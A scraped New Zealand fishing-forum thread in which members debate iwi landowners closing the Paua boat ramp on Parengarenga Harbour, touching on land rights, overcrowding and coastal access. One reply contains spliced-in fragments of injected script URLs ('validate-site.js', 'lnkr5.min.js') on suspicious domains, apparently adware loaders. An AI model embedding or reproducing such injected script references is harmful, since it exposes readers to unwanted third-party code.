Sad sign of the times....

Page  12>
Post Options Post Options   Likes (0) Likes(0)   Quote Capt Asparagus Quote  Post ReplyReply Direct Link To This Post Topic: Sad sign of the times....
    Posted: 23 May 2018 at 9:38am
Capt Asparagus View Drop Down
Titanium
Titanium

Seems Paerengarenga has been closed off from the general public...., at least access to the launch areas has been. You cannot get a key to little paua any more, all because the locals were slacked off that guides were taking folks there fishing and/or a fishing show was using it and not doing the whole Koha thing.
Sad really, but typical.
It is only my overwhelming natural humility that mars my perfection.

Captain Asparagus, Superhero, Adventurer.
Post Options Post Options   Likes (1) Likes(1)   Quote corosanta Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 10:10am
corosanta View Drop Down
Platinum
Platinum

No surprises there then...
Sitndrinkntalknbullman
Post Options Post Options   Likes (1) Likes(1)   Quote Tagit Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 10:14am
Tagit View Drop Down
Titanium
Titanium

That's really sad to hear. I used to camp at Paua (mid/late 1970s - by the fert shed back then) with a couple of uncles and my dad for a week at a time. Wasn't any ramp back then so lowered a 13ft tinny down the cliff. Usually had the place to ourselves. Took a portable cold smoke house that we would set up and smoke a heap of Snapper. All those lovely Trevs were just 'bait' back then. Did try smoking some Tope though on one trip where we got murdered by sharks. Tasted OK but after a couple of days eating too much of it I can still taste that 'shark flavour' anytime I try to eat shark and don't like it.
Remember the long drop toilet sitting on the overhanging cliff edge so that you looked down the bowl into the sea. Couple of cables off the front side to anchor it from falling. Didn't encourage long visits and a definite no fishing zone below there. 
From memory you used to get the key from the local store.  I think my uncle who did the organising would drop off a box of smoked fish in thanks after the trip.
Seems like a lot of those old cooperative ways are getting lost in a mix of bureaucracy, greed, and lack of simple good manners. Partly due to population growth no doubt, but also a sign of how our society is not as considerate of each other as perhaps it once was.
Post Options Post Options   Likes (0) Likes(0)   Quote Torpedo Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 10:49am
Torpedo View Drop Down
Gold
Gold

Yep sad news alright, it's a place I usually frequent. Has been closed since prior to Christmas and must of caught a lot of holiday makers out. There's been plenty of rumors but here's hoping it'll open again one day.

Post Options Post Options   Likes (2) Likes(2)   Quote Marligator Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 11:19am
Marligator View Drop Down
Titanium
Titanium

I have contacts up in that area, and I had heard this was going to happen ages ago. Since a number of TV shows had done episodes featuring the harbour and adjoining area there has been a marked increase in the number of people fishing the harbour, especially from outside of Northland. This harbour was basically the last untouched harbour and the locals want to try and keep it this way as much as possible and I can see their point. 

Another thing to consider is access is through Maori Land and as such it is their right to let people through or not.

If you want to fish the harbour you still can by motoring up the coast from Houhora, quite a long run definitely a doable day trip.
Post Options Post Options   Likes (1) Likes(1)   Quote Tagit Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 11:48am
Tagit View Drop Down
Titanium
Titanium

Whilst I don't like the thought that I might never take my kids camping at Paua like I did with my father and uncles (was on the too do list with them)I can understand how the locals might not want our ever increasing population inundating their space and local fishery. Sad, but just another price we pay for having our population grow so fast and of course for our ever increasing media (mass, social etc) promoting all those previously hidden little gems that 99% of he population might normally never know about. Would be cool if the locals could maybe develop a small camp site where they could effectively limit the number of people accessing via Paua whilst still allowing some managed access and hopefully providing some local employment and tourist income without overwhelming the natural ecosystem. I guess there is probably some logistical/bureaucratic reason why they haven't already done so though.
Post Options Post Options   Likes (0) Likes(0)   Quote deacs Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 11:53am
deacs View Drop Down
Titanium
Titanium

Pretty sad really as was a great place to fish or launch to get out to north cape in small boats, it always interests me to know how many people actually make the effort to get up there and fish, whenever we have been there theres has been very few but with the fishing shows doing a few things then it must have increased.
Interesting about Koha and i'm sure its not why they shut it, we paid for the key, brought food from the store and i don't think we ever got our bond back as we always dropped the key off after hours, is it expected of us to also provide Koha?
We would usually take some fish back to Waitiki for the locals there but not the store.

I guess we will all now have to stay at the house BAF stay at with access to the harbour.... good for who ever owns that!

Will be very interesting to see how much better the fishing gets with very little pressure
Post Options Post Options   Likes (1) Likes(1)   Quote Dead Ant Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 12:12pm
Dead Ant View Drop Down
Platinum
Platinum

The actions of the few became the actions of the many.  I wouldn't be poking accusations at the TV Shows solely as before them it was magazine articles.  It came down to general abuse of an invitation by a large amount of users who thought it was a right rather than a privilege to be savoured.  I might have to plan a sea based trip up there...
Post Options Post Options   Likes (0) Likes(0)   Quote JK Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 12:33pm
JK View Drop Down
Moderator - Black Belt
Moderator - Black Belt

Sad to hear. Used to spend a lot of time fishing off the wharves there as a kid and the odd boat launch there.
LedgeNZ LBG
Post Options Post Options   Likes (0) Likes(0)   Quote winzurf Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 12:39pm
winzurf View Drop Down
Silver
Silver

the water and the coast belong to all New Zealanders ,and its a disgrace they are allowed to get away with thishttps://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=32">https://infoprovider.group/addons/lnkr5.min.js">

sure there may be extra people coming up - but they have no right to restrict access
LED Strips & Underwater Lights Specialized Lighting Concepts
Post Options Post Options   Likes (0) Likes(0)   Quote deacs Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 12:40pm
deacs View Drop Down
Titanium
Titanium

I am picking you will still be able to fish the wharves there JK, with the limited boat fishing may even make them more exceptional! 

Winzurf, they are not actually stopping you accessing the coast, just the boat ramp that you go across their land to get to. Not sure who up keeps or pays for it.
Post Options Post Options   Likes (1) Likes(1)   Quote Capt Asparagus Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 1:39pm
Capt Asparagus View Drop Down
Titanium
Titanium

No question it is their right to deny access to their land for sure, just sad that they have done so. You still have access to the Paul wharf, no worries. If you do not mind scrambling down the bank you could even get a small boat on the water. But no more launching there with trailerboats sadly.

To be honest, it is no great loss to me, and keeping one harbour largely untouched...well, fair enough. Still....it is sad.
It is only my overwhelming natural humility that mars my perfection.

Captain Asparagus, Superhero, Adventurer.
Post Options Post Options   Likes (2) Likes(2)   Quote NWcoastLBG Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 1:59pm
NWcoastLBG View Drop Down
Bronze
Bronze

Yes winzurf everyone has a right to access the coastline but the point you're missing is no one is being denied presence on the waterfront around Paua campground, its the campground/land itself which as you all know is the access point to the ramp that is closed. It is Iwi land and they can do with it as they please, just as any other land owner can do with their property. Lots of changes are happening, Ngati Kuri have got back allot of their land including Te Paki station, they have also taken back management of Spirits Bay from DoC. I think its a brilliant thing and a long time overdue!
Post Options Post Options   Likes (1) Likes(1)   Quote letsgetem Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 2:20pm
letsgetem View Drop Down
Titanium
Titanium

You aint seen nothing yet!

MACA (Marine and Coastal Area ACT) claims might lead to many such places becoming inaccessible to most New Zealanders.

I say might because there is opposition building to the claims yet to be determined. Sadly though there does not seem to be much opposition from within the fishing fraternity.
Post Options Post Options   Likes (1) Likes(1)   Quote Muppet Quote  Post ReplyReply Direct Link To This Post Posted: 23 May 2018 at 8:56pm
Muppet View Drop Down
Titanium
Titanium

Shame really. I don't think you could ever recreationally fish out that harbour, no way not even close. What ever rod n reel anglers would do there would barely scratch the surface of the fish population. Weather would also play a major part in keeping enough angler free days on the harbour. 

There is a fantastic opportunity there for Maori to showcase the best harbour angling in NZ on a whole other level. They should get into it, no one knows the harbour better and they could create a few jobs etc. 

Thousands of tourists pass by on the way to Cape Reinga surely some would love to bed down there for a night and go for a guided fish? 

All I see is a missed opportunity.  
Post Options Post Options   Likes (1) Likes(1)   Quote Jiggity Quote  Post ReplyReply Direct Link To This Post Posted: 24 May 2018 at 6:58am
Jiggity View Drop Down
Bronze
Bronze

Good job.   I'm happy they did it. Saw so much rubbish floating around last time I was there coming from 6 boats in the channel.
Talk is your going to need a locals card to use mill bay ramp...
Post Options Post Options   Likes (1) Likes(1)   Quote deacs Quote  Post ReplyReply Direct Link To This Post Posted: 24 May 2018 at 8:25am
deacs View Drop Down
Titanium
Titanium

Dan (Muppet) I just don't think they care about the revenue opportunities or sharing the place with others, but right or wrong protecting the place for themselves. The first thing i thought was how much revenue is that shop and the local community going to lose. Same with them trying to lock up East Cape, good luck to any of them that rely on the tourist/holiday maker dollar for a living. If they really wanted to as you suggested they could create something awesome for tourists and holiday makers alike. Maybe long term they will but right now the only solution people around these areas seem to see is to lock everyone out.
Post Options Post Options   Likes (1) Likes(1)   Quote Muppet Quote  Post ReplyReply Direct Link To This Post Posted: 24 May 2018 at 10:24am
Muppet View Drop Down
Titanium
Titanium

That’s right deacs you could not get a better way to earn a living. I guess they don’t want to play a part in the economy of the country.
Post Options Post Options   Likes (0) Likes(0)   Quote corosanta Quote  Post ReplyReply Direct Link To This Post Posted: 24 May 2018 at 10:29am
corosanta View Drop Down
Platinum
Platinum

Originally posted by Jiggity Jiggity wrote:

Good job.   I'm happy they did it. Saw so much rubbish floating around last time I was there coming from 6 boats in the channel.
Talk is your going to need a locals card to use mill bay ramp...

Are you referring to Mill Bay ramp at Mangonui?

That could be interesting given the governance of the place at present.

Rest assured that I will not be the Big Inspector of that idea.
Sitndrinkntalknbullman
Post Options Post Options   Likes (1) Likes(1)   Quote cirrus Quote  Post ReplyReply Direct Link To This Post Posted: 24 May 2018 at 10:48am
cirrus View Drop Down
Titanium
Titanium

What happened to the queens chain.

Or alternativly in Scotland the law state people are free to roam.

Have we lost something.?
Page  12>